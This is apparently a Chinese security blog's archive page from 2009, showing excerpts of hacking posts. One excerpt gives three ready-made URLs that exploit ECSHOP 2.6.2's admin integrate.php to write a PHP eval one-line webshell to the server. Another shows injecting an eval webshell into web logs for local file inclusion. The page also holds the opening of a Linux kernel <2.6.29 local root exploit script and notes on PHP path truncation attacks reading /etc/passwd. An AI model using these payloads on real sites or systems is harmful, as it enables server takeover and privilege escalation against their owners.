从抓包到嗅探
Posted in 搬家之前 on 4月 16th, 2009 by 飘(piao2010) – Be the first to comment
此文是我的计算机网络课作业,拿出来凑凑数。
第一次接触“抓包”这个词应该是在高一的时候,当时刚刚迷上网络安全,经常从《黑客X档案》中看见一些利用抓包技术入侵的文章,最常用的工具就是WsockExpert, read more »
搬家之前
php文件系统攻击向导
Posted in 安全相关, 搬家之前 on 4月 12th, 2009 by 飘(piao2010) – Be the first to comment
一.php文件系统路径正常化攻击
在路径中使用/和/.会使/etc/passwd/或者/etc/passwd/.作为一个文件被打开.
二.php文件系统过程路径截断攻击
PHP有一个路径截断的问题(一个非常邪恶的手段snprintf())只允许使用MAX_PATH被作为打开文件或者目录的鉴定.
ECSHOP2.6.2后台拿WEBSHELL
Posted in 搬家之前 on 4月 11th, 2009 by 飘(piao2010) – Be the first to comment
请勿用于非法用途
利用方法:
http://www.xx. com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>
htp://www.xx. com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>
http://www.xx .com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>
三个链接,随便输入一个就可以了,生成http://www.xx.com/data/integrate__log.php,就是一句话小马了~
PHP本地包含漏洞的新突破口
Posted in 安全相关, 搬家之前 on 4月 11th, 2009 by 飘(piao2010) – Be the first to comment
这是一个很好的思路,我们可以随意构造
.php”>http://www.exp.com/index<?/**/eval($_POST[cmd]);/**/?>.php
这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:
http://www.milw0rm.com/exploits/4029
不过很遗憾,这类情况只能在short_open_tag=on的情况下才能有效,当short_open_tag=off时, read more »
Linux kernel
Posted in 0day, 搬家之前 on 4月 9th, 2009 by 飘(piao2010) – Be the first to comment#!/bin/sh#################################################################################### gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit # # by Milen Rangelov (gat3way-at-gat3way-dot-eu)## Based on ‘exit_notify()’ CAP_KILL verification bug found by Oleg Nestorov.# Basically it allows us to send arbitrary signals to a privileged (suidroot)# parent process. Due to a bad check, the child process with appropriate exit signal# already set can first execute a suidroot binary then exit() and thus bypass# in-kernel privilege checks. read more »
